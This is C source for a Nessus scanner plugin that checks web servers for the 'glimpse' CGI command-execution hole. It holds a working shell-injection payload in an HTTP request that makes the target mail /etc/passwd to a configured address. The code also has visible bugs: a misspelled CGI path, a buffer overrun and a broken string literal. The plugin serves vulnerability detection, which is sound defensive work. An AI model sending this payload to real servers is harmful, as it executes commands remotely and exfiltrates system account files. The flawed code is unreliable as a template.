#include <config.h>
#include <nessus-devel.h>
#include <nessuslib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>   
      
#define NAME "glimpse-cgi tester"
#define DESC "This plugin determines whether the 'glimpse' cgi is installed \
This cgi allows a remote user execute any commands on the server"
#define COPYRIGHT "ported by Renaud Deraison"
#define SUMM "determines the presence of the 'glimpse' cgi"



int plugin_init(struct arglist *desc);
int plugin_init(struct arglist *desc)
{
	plug_set_name(desc, NAME);
	plug_set_description(desc, DESC);
	plug_set_summary(desc, SUMM);
	plug_set_copyright(desc, COPYRIGHT);
	plug_set_category(desc, ACT_ATTACK);
	plug_set_family(desc, "CGI abuses");
	return(0);
}


int plugin_run(struct arglist * args);	
int plugin_run(struct arglist * args)
{
	
	
	
	if(host_get_port_state(args, 80)<=0)return(0);
	
	
	if(is_cgi_installed(args, "glimpse"))
	{
	char * buffer = emalloc(1024);
	char * result;
	char * email = get_preference(args, "email");
	int soc = open_sock_tcp(args, 80);

	if((soc<=0) || (email == NULL))
	 {
	 post_hole(args, 80, "The 'glimpse' cgi is present\nRemote commands may be\
 executed");
	 close(soc);
	 }
	else {
		char * emaill;
		int i=0;
		
		emaill  = emalloc(strlen(email) + 1);
		while(email[i]!='@' && email[i])
		{
		 emaill[i] = email[i];
		 i++;
		}
		emaill[i]='\\';
		while(email[i])
		{
		emaill[i+1] = email[i];
		i++;
		}
	  	sprintf(buffer, 
"GET /cgi-bin/glimpe?|IFS=5;CMD=5mail5%s\\</etc/passwd;eval$CMD;echo\n", emaill);
		
		send(soc, buffer, strlen(buffer), 0);
		result = emalloc(strlen(buffer) + 100);
		sprintf(result, "The 'glimpse' cgi is present\
/etc/passwd sent to %s
Solution : delete this cgi or upgrade it to a patched version", email);
		efree(buffer);
		efree(email);
		post_hole(args, 80, result);
		efree(result);
		close(soc);
		}
	}
	return(0);
}

